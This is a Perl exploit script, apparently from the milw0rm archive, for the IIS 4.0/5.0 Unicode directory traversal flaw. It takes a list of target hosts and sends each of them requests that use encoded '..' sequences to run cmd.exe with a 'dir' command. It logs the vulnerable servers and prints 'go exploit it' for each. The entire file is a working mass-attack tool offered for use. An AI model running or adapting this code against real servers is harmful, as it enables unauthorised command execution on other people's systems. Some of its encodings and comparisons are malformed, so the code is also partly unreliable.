#!/usr/bin/perl
#
# IIS 4.0/5.0 Unicode Exploit
# Checks for each script that has been posted on the BugTraq Lis
# Shouts to bighawk(thats for help), datagram, Ghost Rider, The Duke, p4, kript0n and others
# Since It Uses fork(), you gotta keep up with whats happening. Or Just Let it run and it will
# log sites in the log_unicode.log.
# So Simple
# Use Socket
use Socket;
# incase no arguements or less arguements are given
if(@ARGV == '0' || @ARGV < 2) { die "IIS 4.0/5.0 Unicode Exploit\n".
"Programmed by SteeLe\n".
"Usage: ./$0 <single host> <dir for exploit>\n"; }
# Variables
$blah = $ARGV[0];
$port = 80;
$dir = $ARGV[1];
$timeout = 4;
# see if file is there,
if (-e "$blah") {
open(T, "$blah") || die "can't open $blah\n";
@target = <T>;
close(T);
}
else { @target[0] = $blah; } # what you think is blah
# all scripts mentioned on bugtraq, we know rfp knows more.
@scripts = ("..%c1%1c..", "..%c0%9v..", "..%c0%af..", "..%c0%qf..", "..%c1%8s..", "..%c1%9c..",
"..%c1%pc.."); # blah, i know i'm not l33t
# Open LOG Script
open(LOG, ">>log_unicode.log") || die "couldn't open a file for writing\n";
# Socket Stuff
foreach $script (@scripts) {
$submit = "GET /scripts/$script/winnt/system32/cmd.exe?/c+dir+$dir HTTP/1.0 \n\r\n\r";
$ouch = "/scripts/$script/winnt/system32/cmd.exe?/c+dir+$dir";
foreach $site (@target) {
unless(fork()) {
chop($site) if $site =~ /\n$/; &connect($site);
} # so i lied
}
}
sub connect { # real socket stuff
my ($ste) = @_;
$iaddr = inet_aton($ste) || die "$ste might not be up, connecting to next site....\n";
$paddr = sockaddr_in($port, $iaddr);
$proto = getprotobyname('tcp');
local $SIG{ALRM} = sub { print "TimeOut On $ste, going to next one....\n" && exit(0) };
alarm $timeout;
socket(SCAN, PF_INET, SOCK_STREAM, $proto) || die("Error: couldn't make a socket to $ste");
connect(SCAN, $paddr) || die "Sorry couldn't connect to $ste, connecting to next site....\n";
send(SCAN, $submit, 0);
$blackout = <SCAN>;
($http,$code,$blah) == split(/ /, $blackout);
if ($code == "200") {
print "$ste has $ouch on there, go exploit it\n";
print LOG "$ste has $ouch on there\n";
}
else { print "$ste doesn't have it\n"; }
close(SCAN);
exit(0);
}
close(LOG);
# since we're done
exit;
# milw0rm.com [2000-11-18]